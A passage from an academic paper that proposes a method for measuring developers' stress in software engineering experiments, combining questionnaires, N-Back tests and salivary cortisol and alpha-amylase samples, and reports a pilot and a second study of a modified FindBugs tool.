10.7717/peerj-cs.286 7/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ (situation assessed to be threatening). Despite that feeling he/she still starts working on the problem (coping). The new team member is working on the problem and his/her knowledge and skills increase as he/she is going and the assessment of the situation may change to “risky but worthwhile”. The assessment can change again in the course of action, for example if the new member encounters a problem which can not be fixed easily. The assessment can then again rise to threatening or even harmful, depending on the personal resources available. Still the assessment will continue until the situation is solved one way or another. It is important to keep these definitions of stress in mind when designing a study or experiment which aims to measure stress because we need to be aware of the stress generation, which is still not fully understood (Noack et al., 2019). Most of the time we will already have a stressor we want to take a look at (e.g., project deadlines), but to keep that stressor as free from other influences as possible, and for a correct interpretation of the results later on, we need to look at potential constraints and demands which might not affect all participants in the same way. We also have to find a way to make the participant care about the outcome of the stressor if it is an artificially created stressor. There are some commonly used ways to induce stress in experiments like the Trier Social Stress Test (Kirschbaum, 2015) which uses social evaluation and cognitive demands to generate stress. Another way can be to create a competitive scenario in which participants can earn a reward based on their results on a task compared to the other participants. Effects of stress To understand the ways to measure stress, we need to know the basic reactions of the body and mind to stress. A frequently cited summary of the general effects of stress has been written by Kaufmann, Pornschlegel & Udris (1982). Somatic psychological short-time effects include increased heart rate, raised blood pressure and adrenalin discharge. The personal psychological effects might include a feeling of strain, frustration, anger, fatigue, monotony and saturation. The individual behavior can suffer from performance fluctuation, decline of concentration ability and bad sensorimotor coordination, leading to an increased error rate. Medium and long term stress exposure can lead to psychological problems such as dissatisfaction, resignation and depression and general psychosomatic ailment and disease. The negative effect of medium to long-term exposure to stress on the behavior can include increased consumption of nicotine, alcohol or drugs as well as absenteeism (sick days) on individual level and conflicts, quarrels, general aggression against others and withdrawal (isolation) at and outside of work on a social level. Even short-term stress can lead to unpleasant side effects, which are especially harmful for communication and cooperation-dependent work like software development. Since 1982 when Kaufmann, Pornschlegel & Udris (1982) summarized the effects, more research has been conducted supporting and extending the understanding of stress effects mentioned by them. We will go into more detail below. Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 8/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ Physical reactions 1 The physical reactions of the human body can be explained by the survival needs of our ancestors. It is often called the “fight or flight” reflex, first introduced by Cannon (1929). In stressful situations in prehistoric times, for example, the encounter with a predator, the body needs energy to fight or to run away (flight), so it releases adrenaline to the blood stream, ordering the endocrine system to start providing chemical energy. Noto et al. (2005) described the effects of stress on the endocrine system focusing on cortisol and alphaamylase. In short, under stress cortisol and alphaamylase concentration increases providing additional energy to the organism (e.g., increasing the blood sugar). Both these effects help the body to release chemical energy (e.g., sugar) to the blood stream. These effects are traceable in saliva. The heart rate increases (Vrijkotte, Van Doornen & De Geus, 2000) in stressful situations to transport the mentioned substances faster through the body as well as to provide more oxygen which is needed to utilize the chemical energy carriers freed by the cortisol and the alphaamylase. Due to the increased body activity, sweat can break out, changing the dialectical conductivity of the skin as a result. Sweat might also be a result of physical work which is considered a form of stress for the body. Stressful exhaustion might lead to involuntary muscle contraction (tremors). But not only physical stress can lead to involuntary muscle contraction. Getting tired as a result of work/stress leads to increased blinking. These are short-term reactions. If these-short term effects are prolonged, they can have negative effects on the human body. Commonly mentioned effects of long-term stress on the human body are: high blood pressure, high cholesterol values and heart diseases (Weinert, 2004; Kaufmann, Pornschlegel & Udris, 1982; Richter & Hacker, 1998). The physical reactions of the human body to stressful events can change based on the demands and resources (e.g., a more muscular person might endure physically demanding work longer than the average person). Most of the reactions to stress are internal, steered by the hormone system. The increase of these chemical messengers can be utilized as a measurement as they remain in the blood and also in saliva and urine for some time. Psychological reactions If the stressing situation prevails, it has negative short and long-term effects not only on the body but also on mental health. Mental health problems related to stress are on the rise in the modern world as shown by Lademann, Mertesacker & Gebhardt (2006) in their analysis of the sick notes submitted to health insurances or in the stress report for Germany (Lohmann-Haislah, 2013) which gives a yearly overview of the stress situation of the German workforce. Cohen (1980) wrote a summary of the research on stress effects so far. Among other topics, he wrote about after-effects on the social behavior of stress plagued persons. He reported about various experiments where the participants previously exposed to stress showed significantly less helpfulness and empathy as well as higher levels of aggression towards other people. Amongst others, Weinert (2004) listed as psychological effects of stress (similar to the definitions seen in “Effects of Stress”): poor concentration, difficulty 1 Where not explicitly cited, the reference is taken from the textbook “Biologische Psychologie” by Birbaumer & Schmidt (2010). Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 9/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ making decisions, obliviousness, thought blockades and burnout as well as subjectively experienced anxiety and lethargy. The authors focused on the negative aspects of prolonged exposure, but should not forget that short-term stress also has positive effects, like increased motivation and energy as discussed by Folkman (2008). Also, both stress reactions are subjected to individual perception of stress. The perception of stress can be modified by, for example, changes at the workplace such as placement of tools or changing working positions. It is also bound to personal stress resilience, which can be genetic or mental, but can be increased by focused training. Stress is a multi-faceted phenomenon which makes it challenging to measure. There are many methods proposed by researchers from distinct science branches and interdisciplinary research, for example by Kanner et al. (1981), Lazarus (1990), Cohen, Janicki-Deverts & Miller (2007) and Plarre et al. (2011). STRESS MEASUREMENT TECHNIQUES As we have seen in the previous section, stress is a multifaceted construct that can be defined in different ways according to different disciplines. Following the work by Cohen, Kessler & Gordon (1997), the measurement of stress is split into mainly using psychological measurements, such as questionnaires, and mainly using measurements of biological markers, such as hormone levels and psycho-physiological reactions (Vrijkotte, Van Doornen & De Geus, 2000). Psychological measurements Many different variations of psychological measurements of stress have been discussed over time (Cohen, Kamarck & Mermelstein, 1983; Peacock & Wong, 1990; Kanner et al., 1981). Psychological measurements can be grouped into two classes: those which assess long-term stress (e.g., Life Changing Events by Rahe (1977)) and short-term stress (e.g., Emotional Self Rating by Schneider et al. (1994)) based on self report and concrete situations, and those which look at more global coping strategies of participant who are not directly connected to a specific trigger (e.g., Stressverarbeitungsfragebogen by Janke, Erdmann & Boucsein (1984)). The long-term assessment strategies are used to investigate the impact of stress on the well-being or health of individuals. This method uses interviews or tests that should represent the overall picture of the stressful events in someone’s life, for example, the death of a loved one or job loss. The short-term assessment strategies try to assess the stress experienced for some minutes up to an entire day by at least two questionnaires or interviews, ideally before and after the stressful event. The items used in these tests range from a plain assessment by the participant on the momentary stress level on a scale from 1 to 5 to more episodic tales of events including the points of why this event was found to be stressing, how severe and long the stress was felt. This kind of data collection is used regularly in psychology as well as medical research and is commonly considered as reliable given good psychometric properties. Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 10/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ An example from the software engineering point of view to distinguish between long and short-term term stress assessment could be the difference between keeping track of a whole development project, taking a sample each day and assessing the stress of a single 4-h programing session. The other class, aiming at looking at stress coping strategies, uses questionnaires that ask general questions like “How do you handle stressful situations?” or “What kind of situations do stress you?”. This can also be done over a period of time, to gather a stress profile, by repeating these question over the day. Stress also affects concentration and memory (Weinert, 2004) because of the cognitive resources needed to cope with the increased stress. This use of cognitive resources is called cognitive load. Cognitive load can be measured by testing concentration and memory of participants using tests like the N-Back-test (Gevins & Cutillo, 1993). Stress can also have a negative effect on a person’s mood, leading to frustration and anger at short-term and, at worst case, to a depression at long-term exposure, as mentioned in “Effects of Stress”. Mood can be assessed by questionnaires like PANAS (Positive and Negative Affect Scale, Watson, Clark & Tellegen (1988)) or ESR (Emotional Self Rating scale, Schneider et al. (1994)). All these questionnaire based approaches can suffer from common issues and biases when working with humans participants (King & Bruner, 2000; Paulhus, 1991; Schwarz, 1999): � Honesty/Image management: The problem how the participant wants to present him/herself and what he/she is willing to reveal about him/herself. � Social desirability: The distortion of answers by the participants because they feel like some answers are more socially acceptable than others. � Introspective ability: Concerns to which degree the participant is able to understand him/herself. � Understanding: As human language is not perfect and needs to be interpreted, formulations can be understood differently. � Rating scales: The nuances of ratings can be interpreted differently. � Response bias: The individual’s tendency to respond in a certain way, regardless of the actual evidence they are assessing. Psychological tests have ways to balance such issues by providing control answers which show contradictions. Despite that, it is always desirable to back up these results with biological factors which are much harder to be influenced by involuntary effects and biases. Biological markers The biological factors available to us and mentioned in literature to measure stress are heart frequency, blood pressure, electrical conductivity of the skin, activity of muscles and hormone levels (Birbaumer & Schmidt, 2010). The assessment of these factors is not easy, as the difference between a normal phase of strain and abnormal stress needs to be considered and not every factor is applicable to each form of perceived stress (physiological, emotional, mental). Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 11/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ Skin conductance The skin conductance is measured whenever the differential or changing impact of stress needs to be assessed (Andreassi, 2013). Electrodes have to be attached to the participants non-dominant hand. This approach has two main disadvantages: first, it might introduce additional stress as the electrodes are a constant reminder for the participant that they are being monitored and, in a typical case of software engineering research, it is not applicable to larger groups in parallel because of the need of multiple devices for measurement and medical trained personal for the correct application of the electrodes. Sensors for measuring the sweating can be used if only a difference between calm and stressed states is of interest and no finer assessment is required. Heart rate The measurement of heart rate and blood pressure can be a sensitive tool to measure mental stress (Hjortskov et al., 2004) but it suffers from the same disadvantages as the measurement of skin conductance: the invasion of personal space and the in-feasibility to extend it to large groups, for the same reasons as mentioned for conductivity of skin. Muscle activity We base our discussion of muscle activity on the works by Boucsein (1991, 1993). Muscle activity can be measured, among other ways, via eye blink frequency, eye movement or mydriasis (size of the pupil) using an electromyogramm or observing muscle tremors. The difficulty to obtain the measurements and the expressiveness of these measures varies widely. While blinking frequency, eye movement and size of the pupil are relatively easy to measure for individuals, the results are heavily dependent on the task given and are only significant in combination with other measurements. Tremors can be observed optically, but are mostly a sign of physical stress which is not a form of stress normally induced by computer work and so it is out of the scope of this work. The electromyogramm is a good method to measure muscle activity using electrodes similar to the one used to measure skin conductance. This again is more meaningful for the research on physical stress which the average software developer is not likely to experience in an extended amount in day to day work. Besides the low relevance for software engineering, the methods to measure muscle activity suffer from the same disadvantages as mentioned for skin conductance. Hormone level The usefulness of hormones for stress assessment has been shown by Goldstein (1995) and Noto et al. (2005). The hormone levels of cortisol and the protein alpha amylase (Nater et al., 2005) which indicates the utilization of blood sugar are found in saliva samples (Chiappelli, Iribarren & Prolo, 2006; Kirschbaum & Hellhammer, 1994; Chatterton et al., 1996; Reinhardt et al., 2012). Saliva can be gathered and stored for a couple of days in plain plastic tubes, without any specialized equipment or sophisticated cooling mechanism. If the samples are to be stored for a longer time, they have to be frozen to avoid degradation. Samples can be sent to a laboratory for analysis via postal service. The laboratory will use an analysis kit and return the analysis results. The results can be Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 12/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ interpreted using basic statistical tests. Support by medical trained scientists improves the quality of the conclusions drawn from the results as they might be able to explain possible outliers originating from health problems of the participants or medical drugs used by participants. Hence, we opt for the latter biological family of stress assessment which we pair with validated psychological assessment. We propose a methodology in the following. PROPOSED METHOD FOR STRESS MEASUREMENT The method we propose, inspired by Kirschbaum & Hellhammer (1994), Van Eck et al. (1996), and Strahler et al. (2017), is applicable to controlled experiments in software engineering which aim to examine the effects of stress. It consists of measurements of psychological markers, measurements of biological markers, and a description of sequences and details of the measurements. The measurement tools for the psychological and biological markers have been selected in cooperation with psychologists, have been used in a massive amount of studies (e.g., Hellhammer, Wüst & Kudielka (2009), Khalfa et al. (2003), Thompson et al. (2012) on hormone usage, e.g., Pressman & Cohen (2005), e.g., Jennett et al. (2008) on PANAS and Weiss, Salloum & Schneider (1999), Schneider et al. (1999) on ESR), and are commonly agreed to be reliable and valid. Measurement tools We propose to assess stress, emotional state and cognitive load of participants, where the first factor is observed both from a psychological and a biological perspective. Figure 1 describes in greater detail the constructs under study and the related measurement instruments. We assessed stress using biological markers through saliva samples. In particular, we measured cortisol and alphaamylase, as the saliva samples are easy to gather and the hormone/enzyme levels in it are easy to measure by any laboratory specialized in hormone analyses. We propose PANAS (Positive and Negative Affect Scale, Watson, Clark & Tellegen (1988)) and ESR (Emotional Self Rating scale, Schneider et al. (1994)) for the psychological stress and emotional stress markers as self-ratings have a good time-to- information ratio. PANAS and ESR are used to assess the participants emotional state and current mood, as increase in stress has a negative effect on mood (see “Effects of Stress”). We extended PANAS with questions asking about pre-existing stress levels and possible previous knowledge and skills related to the task to be done in the experiment, because previous knowledge can have an impact on coping strategies of the individual and have an impact on stress generation. With these extensions our PANAS scores for the positive factors ranges from 0 to 50 and the negative factors from 0 to 55. Cognitive load (see also “Psychological Measurements” on Psychological Measurements) is conveniently operationalized and measured by the N-Back test as implemented by the computerized PEBL Psychological Test Battery (Mueller & Piper, 2014). PEBL allows the data to be gathered automatically and exported as datasets. N-Back challenges participants to memorize letters and their position in a sequence of letters which are shown one letter at a time. With a N-Back test, participants have to press a key if a Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 13/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ letter has been repeated n steps back. For example, for the letter sequence {X, X, X, V, X, Y, Y} and a 1-Back test, the key should be pressed at (1 for key press, 0 for no key press) {0, 1, 1, 0, 0, 0, 1}. The correct key presses for a 2-Back test would be {0, 0, 1, 0, 1, 0, 0 }. The hit/miss ratio and reaction time indicates how much cognitive capacity is left to work with. In order to reduce the learning effect when the test is used multiple times, there are variations of this test (e.g., not letters, but positions in a 3 × 3 square are to be correctly remembered). Besides demographic data, a study should also collect control-variables that might influence the stress reaction, such as pre-existing mental conditions and medications (e.g., birth control pill). Also, as this might have an increasing effect on personal stress, we asked how satisfied the participants were with their decision of life and work situation alongside the demographic questions. The data was gathered anonymously and linked together only through an anonymous identifier. Figure 1 Our proposal for a robust and sound experimental design to assess causes and consequences of stress in software engineering. The grayed-out activities were omitted in the final design iteration. Full-size DOI: 10.7717/peerj-cs.286/fig-1 Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 14/38 http://dx.doi.org/10.7717/peerj-cs.286/fig-1 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ Measurement sequence The first step in implementing our proposed method is to decide on the frequency and placement of the cortisol and alphaamylase measurements. The decision should take into consideration that, while more measurement points in a shorter period of time will provide a more detailed picture of the stress reaction to the topic under observation, it also will affect the stress generation itself. The shortest cycle is also limited by a few parameters. Participants only have a limited ability to generate enough saliva. Too frequent disruptions might be perceived as a nuisance, increase the generated stress, and might have an additional negative effect on the topic under research or even cover the stress reaction under observation. Also, the hormone system reacts in the range of minutes to hours whereas the nervous transmission reacts in milliseconds (cortisol peeks around 15–20 min after stress onset (Kirschbaum & Hellhammer, 1994)). If the stress-inducing task is too short (less than 10 min) a second sample should be gathered to increase the chance to include the peak or other measurements (e.g., heart rate or skin conductivity) can be used, but with the impediments stated above. As cortisol has a daily cycle, the gathering of the saliva samples also needs to be planned in a way that all participants are assessed at the same time to generate comparable results. In order to add noise to the cortisol and alphaamylase measurements, it is important to instruct the participants to not consume beverages containing sugar and not to eat or smoke one hour before the saliva samples are gathered. The times when the personal stress and emotional state are assessed have to be adjusted as well. As it takes a non-trivial amount of time to fill in the questionnaires, the personal and emotional assessment should happen at the beginning of the study to determine a measurement baseline, then at appropriate times in the course of the study and at the end of it. In the case of short periods of saliva sample measurements it is sufficient to have the personal stress levels and emotional state measured at the start and end of a task. If the topic under research contains longer breaks we advise to use the questionnaire measurement at the start and end of the breaks. For long term studies, we advise to use the self-assessment via questionnaires at least twice a day, possibly at the beginning and end of the work day. By doing so, the influence of stress generated outside the object under research can be identified and taken into account when looking at the stress reaction. In our case, the measurement of the cognitive load happens after a substantial part of the task under research and before the questionnaires assessing the personal stress level and mood, so the cognitive load is only influenced by the task. As with the questionnaires, for long-term studies, the N-Back should be used at the start and end of the working period. We illustrate the entire design process in Fig. 1. It represents the process as it was derived from our literature review and consultations with colleagues from the psychological and medical fields. Participants face a short cool-down period (approx. 5 min) of no activities, for controlling purposes, during which most of their markers stabilize. We then instruct participants about the experiments goals. After that, the participants sign a consent form (not present in Fig. 1). We collect a first sample of Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 15/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ saliva, which sets the baseline stress value of participants. After the baseline stress measurement, participants fill in demographic questionnaires. Following the demographic questionnaires, we start assessing the baseline mood and perceived stress with ESR and PANAS. Participants then face the first computerized task, that is the N-Back test, for assessing the baseline cognitive load. As the N-Back test might be stressful to participants, we take a second saliva sample to be able to monitor the stress build-up for the task under observation later. The “stress” task for the experimental and control groups can then begin. The length and amount of the experimental task parts (Fig. 1 shows two parts) should be dictated by the decision on the saliva sample interval. In our case, we take a third saliva sample at around half of the time planned for task solving. The stress markers cortisol and alphaamylase should be peaking here as the endocrine system has had enough time to respond to the initial stress trigger of the task (cortisol peeks around 15–20 min after stress onset (Kirschbaum & Hellhammer, 1994)). We take a fourth and final saliva sample at the end of the experimental task. Finally, participants do the computerized cognitive load test once more, to measure the available cognitive resources left after the experimental task. A final set of ratings of mood and perceived stress follows. The last two activities are inverted compared to those before the task, as the cognitive load score should not be influenced by the questions for rating mood and self-assessment. Longer studies performed over several days have a similar design to Fig. 1, varying only in the intervals of measurements as mentioned above. If the assessment of the recovery from the stressor is of interest, a measurement of all relevant indicators (cognitive load, mood, perceived stress, hormone/enzyme levels,…) should be done 40–120 min after the stressor onset. In the remainder of this paper, we report on two studies that allowed us to implement and refine the overall research design. TWO STUDIES IMPLEMENTING THE PROPOSED METHOD In the following, we present two studies, the first being a pilot, implementing our proposed method for stress assessment. The lessons learned from the application of this method helped us with its refinement. The purpose of our studies was to analyze stress reduction effects, cognitive load reduction, mood improvement, and software quality enhancement of visual and user experience changes to the static analysis tool FindBugs. The control group used the latest version of FindBugs. The experiment group used a version of FindBugs which was modified following the Salutogenesis principles. Salutogenesis is a well-being theory, based on comprehensibility, meaningfulness and manageability to explain perceived stress or to help cope with it by changing these variables. We have previously proposed this for enhancing the interaction of software developers with their tooling (see Ostberg & Wagner (2016) and Ostberg et al. (2017) for details on Salutogenesis). By design, all tasks required a considerable effort and it was not possible to finish them in the time given. The varying difficulty of the subtasks does not require the participants to meet a certain Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 16/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ level of skill, but some basic understanding of programming, yet still provides enough of a challenge for the advanced participant. Pilot study 1 The pilot study implemented the method of Fig. 1 in its entirety. We only added a set of questions aiming at self-efficacy (Bandura, 1997; Jerusalem & Schwarzer, 1999; Kogler et al., 2017) to the psychological test phases, which allowed us to assess the individual stress resilience of the participants. For the pilot we recruited 43 volunteers from the MSc course “Software Quality Assurance and Maintenance” at the University of Stuttgart. Students were in their 2nd or 3rd semester of studies. None of them reported any medical conditions interfering with the stress measurement. We were aiming for a high number of participants even in the pilot as we wanted to evaluate how easily large groups can be assessed with our chosen methods. To induce stress, the participants were told that a list with the results of their work on the code (number of correct fixes) would be made public, so every participant could see how well he or she did, compared to the other participants. We never delivered on our threat, for obvious ethical reasons, but the stress was induced by our statements. We split the work phase into two parts of 25 min and 20 min, the first part was a bit longer in order to compensate for the time needed to get into the task. To avoid learning effects, the second N-Back test used positions in squares rather than letters. Results Unfortunately, we faced some data loss due to failing hard drives. Boxplots in Figs. 2–4 shows the data we were able to retain. Figure 2 shows the distribution of the PANAS values. From bottom to top we have the sum of the positive factors before the task, the positive factors after the task, the negative factors before the task and the negative factors after the task. The top four plots show the difference between pre and post PANAS scores. This shows the progression of the emotional state of the participants. Figure 3 shows the number of correct responses to the N-Back stimulus in percent and Fig. 4 shows the reaction time in milliseconds to the N-Back stimulus, both pre and post the task. The values for correctness and reaction time are connected, so the participants for both values are the same. Of the PANAS and ESR questionnaires, 10 out of 20 from the experiment group and 11 out of 23 from the control group were usable. The emotional state based on the PANAS values is calculated by summing up the positive effects and subtracting the sum of the negative effects. To see the emotional change, we calculated these values pre and post-work phase. The difference of these values indicates the emotional change. Performing a repeated measures (rm) ANOVA with time (pre, post) and valence (pos, neg) as within-subject factors and group as between-subjects factor revealed no significant effect of time (F(1,18) = 1.540, p = 0.230), a significant valence effect (F(1,18) = 4.615, p = 0.046, part-eta-sq. = 0.204) with higher values in the positive valence than negative valence, Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 17/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ Figure 2 PANAS Pos(itive) and Neg(ative) Mood Indicators Exp(erimental) Group (Sample size = 10) and Con(trol) Group (Sample size = 11). Full-size DOI: 10.7717/peerj-cs.286/fig-2 Figure 3 N-Back correctness for the Exp(eriment) Group (Sample size = 6) and Con(trol) Group (Sample size = 4). Full-size DOI: 10.7717/peerj-cs.286/fig-3 Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 18/38 http://dx.doi.org/10.7717/peerj-cs.286/fig-2 http://dx.doi.org/10.7717/peerj-cs.286/fig-3 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ and no significant group effect (F(1,18) = 0.192, p = 0.667). Moreover, no interaction reached significance (all p > 0.151). The data of the ESR (see also Tables 1 and 2) does also not show statistically significant group differences for the emotion (all p > 0.395) and stress (p = 0.342) ratings. Table 3 reports all values we gathered for cortisol and alphaamylase. See Fig. 1 for the location of the various measurements in the study progress. The sample size refers to the actual sample size used for calculations at this step, as the lab analysis reported invalid values for some steps/participants, probably due to not enough saliva samples left as they had to rerun some of the analysis. From the numbers we can see a build up of a Figure 4 N-Back reaction time for the Exp(eriment) Group (Sample size = 6) and Con(trol) Group (Sample size = 4). Full-size DOI: 10.7717/peerj-cs.286/fig-4 Table 1 Pre and post-experiment task values for ESR factors, experiment group, pilot, sample size = 10. Anger Disgust Happiness Sadness Surprise Fear Stress ESR pre experiment group Mean 1.90 1.40 1.80 1.50 1.90 1.30 2.50 Standard deviation 0.88 0.84 0.92 1.08 0.99 0.67 0.85 Median 2.00 1.00 1.50 1.00 1.50 1.00 2.00 ESR post experiment group Mean 2.3 1.3 1.6 1.6 1.9 1.4 2.7 Standard deviation 1.06 0.67 0.84 1.07 1.37 0.84 0.95 Median 2.5 1 1 1 1 1 3 Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 19/38 http://dx.doi.org/10.7717/peerj-cs.286/fig-4 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ hormone stress response with a slightly later peak in alpahamylase for the experiment group. The statistical tests (Willcoxon U for α = 0.05 for cortisol (C1 = 0.29, C2 = 0.31, C3 = 0.54, C4 = 0.61), Cliff’s delta for cortisol (C1 = −0.068, C2 = −0.76, C3 = −0.3, C4 = −0.564), t-Test for α = 0.05 for alphaamylase (A1 = 0.64, A2 = 0.31, A3 = 0.54, A4 = 0.36) Cliff’s delta for alpha amylase (A1 = −0.42, A2 = −0.18, A3 = −0.57, A4 = −0.61)), reveal no significant differences between experiment and control-group. A rmANOVA Table 2 Pre and post-experiment task values for ESR factors, control group, pilot, sample size = 11. Anger Disgust Happiness Sadness Surprise Fear Stress ESR pre control group Mean 2.09 2.18 1.82 1 1.91 1.36 2.18 Standard Deviation 1.22 1.33 0.75 0 0.83 0.92 1.17 Median 2 2 2 1 2 1 2 ESR post control group Mean 2.09 2 2 1.18 1.18 1.23 2.73 Standard Deviation 1.38 1.34 1 0.4 0.98 0.65 1.27 Median 2 1 2 1 2 1 3 Table 3 Cortisol and alpha-amylase scores, pilot. Experiment Control Experiment Control Baseline cortisol (pg/ml) Offset cortisol (pg/ml) Mean 6.13 7.18 5.63 7.3 Deviation 4.41 4.24 3.93 5.15 Median 4.74 7.2 4.71 6.17 Sample size 14 22 17 22 Peak cortisol (pg/ml) Final cortisol (pg/ml) Mean 6.69 7.11 5.38 4.5 Deviation 4.05 5.09 3.73 2.76 Median 5.77 5.81 5.39 4.2 Sample Size 15 18 11 15 Baseline alphaamylase Offset alphaamylase (U/l) Mean 44.33 55.29 57.15 87.1 Deviation 47.77 83.16 86.32 81.66 Median 19.63 18.76 20.83 50.24 Sample size 14 19 14 21 Peak alphaamylase (U/l) Final alphaamylase (U/l) Mean 62.39 44.73 84.08 47.35 Deviation 78.67 56.75 106.23 54.74 Median 18 18.95 18.76 20.39 Sample size 10 17 11 13 Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 20/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ revealed no significant time effect (F(3,36) = 1.096, p = 0.363), no significant group effect (F(1,12) = 0.515, p = 0.487) and no significant group*time interaction (F(3,36) = 0.278, p = 0.788). Similar to the results on cortisol, rmANOVA with alphaamylase levels indicated no significant time effect (F(3,33) = 0.490, p = 0.691), no significant group effect (F(1,11) = 0.861, p = 0.373) and no significant time*group interaction (F(3,33) = 0.443, p = 0.636). The raw data of the hormone levels can be found in the appendix in Tables A1 and A2. The increasing effect size might imply that the differences between the control and experiment groups would grow more visible if the experiment would progress longer and if we had had more usable data points. It is also possible that a greater stress induction will lead to a more visible effect. Due to various problems at the time of the experiment’s execution, we were only able to gather 4 usable data sets (correctness/reaction time for pre and post task) for the control group and 6 data sets for the experiment group for the N-Back test. For these data sets, the other data (PANAS, ESR and hormone/protein levels) is also available. In the pilot we see an improvement of correctness and reaction time for the experiment group (see Median in Boxplot Figs. 3 and 4), while the correctness for the control group decreases. Still, analyzing the effect of intervention on cognitive performance, the rmANOVA with the within-subject factor time (pre, post) and between-subjects factor group revealed no significant time effect (F(1,8) = 0.479, p = 0.509), no significant group effect (F(1,18) = 0.091, p = 0.770), and no significant time*group interaction (F(1,8) = 3.391, p = 0.103) emerged. Conclusion Despite the data being inconclusive, the pilot experiment showed the feasibility of the design. The saliva samples were easy to collect for both, the participants as well as for the researchers, and indications given by the physical measurements match the indications of the psychological measurements. We used the lessons learned to make some changes to the study design which we will discuss next. Study 2 In the design of the second study the grayed-out parts of Fig. 1 are removed. This represents our changes based on the lessons learned of the pilot. We removed the initial cool-down factor and the first saliva sample. For the sake of consistency with the figure, we still call our new first saliva sample the offset stress, but we consider that measurement step our new baseline stress. The pilot test did not suggest potential differences in the measured levels within baseline stress and between baseline and offset stress, so we assume that the psychological test and N-Back session do not induce any significant stress to software developers. As a positive side effect, this elimination of one of the saliva samples reduces the time and money needed for the laboratory analysis. We also reduced the amount of questionnaires in the psychological test phases by removing the resilience questions. The value of these question items did not help in Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 21/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ explaining any of the effects analyzed. During our observation and in post-experiment statements, participants seemed to be most irritated by the resilience questions. We also changed the way we induce stress to the participants in the hope that the changed procedure would show an increased reaction. First we stimulated the participants with a hardly reachable goal for the work on the software. We told them that previous participants had done a minimum of 35 fixes for problems highlighted by FindBugs in 3 different categories and that these were the low achievers. Second, as the groups were much smaller (3–5 participants per session) we could recreate an effect similar to the TSST (Kirschbaum, 2015) effect, by simply having evaluators in the room monitoring the work of the participants and pretending to write down remarks on their notepad from time to time with muttering disapproval. For this experiment we were able to recruit 32 participants from the bachelor study course “Introduction to Software Engineering”. The participants were randomly distributed over 7 dates, 3 for the control group and 4 for the experiment group, resulting in 17 participants in the experiment group and 15 participants in the control group. Again, as in the pilot, the experiment group used our enhanced tool, while the control group used the original tool. None of the participants reported any medical conditions interfering with the stress measurement. Results The results of the PANAS questions (see Boxplot in Fig. 5, missing samples either did not finish or did not fill in questionnaires fully, see “Pilot Study 1” for description of layout) show that both groups experienced a decrease in mood, but the decrease was steeper for the control group (Median for positive factors declines by 6, median for negative factors increases by 3) than for the experiment group (Median for positive factors declines by 2, median for negative factors increases by 2). Still, the range of mood change for both groups is spread over a wide spectrum, so the results are not statistically significant (Wilcox p = 0.6 for α = 0.05) and the effect size (Cliff’s Delta: −0.01) is low. Performing a repeated measures (rm) ANOVA with time (pre, post) and valence (pos, neg) as within-subject factors and group as between-subjects factor revealed no significant time effect (F(1,30) = 0.221, p = 0.642) but a significant valence effect (F(1,30) = 17.992, p < 0.001) as well as a significant time*valence interaction (F(1,30) = 6.918, p = 0.013). However, no significant group effect (F(1,30) = 0.171, p = 0.682) as well as no significant interactions with the factor group emerged (p > 0.335 in all cases). Applying post-hoc analyses on the significant interaction demonstrated a significant increase in negative mood (post > pre, p = 0.043) and a significant decrease in positive mood (pre > post, p = 0.043). In general, positive ratings were significantly higher than negative ratings (pre: p < 0.001; post: p = 0.045). From the results of the ESR questions (Tables 4 and 5), we learned that the control group experienced an increase in disgust and surprise compared to the experiment group. Also, both groups show an increase in self-reported stress but the standard deviation for the experiment group also increased which implicates that at least some participants experienced less stress. The repeated measures (rm) ANOVA shows a significant condition Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 22/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ effect (F(6,180) = 25.359, p < 0.001), a trend for a time effect (F(1,6) = 3.778, p = 0.061), with higher values post than pre, and no significant group effect (F(1,30) = 0.239, p = 0.629) emerged. Moreover, a significant interaction of condition*time (F(6,180) = 3.532, p = 0.007) occurred, while no other interaction reached significant (p > 0.298 in all cases). Post-hoc tests disentangling the significant interaction revealed a significant increase in anger ratings (post > pre, p = 0.001) and a significant decrease in happiness ratings (pre > post, p = 0.012). All other comparisons remained non significant (p > 0.118). The cognitive load (see Figs. 6 and 7, missing samples did not finish both N-Backs, see “Pilot Study 1” for description of layout) again shows the same effect as seen in the pilot Figure 5 PANAS Pos(itive) and Neg(ative) Mood Indicators Exp(erimental) Group (Sample size = 10) and 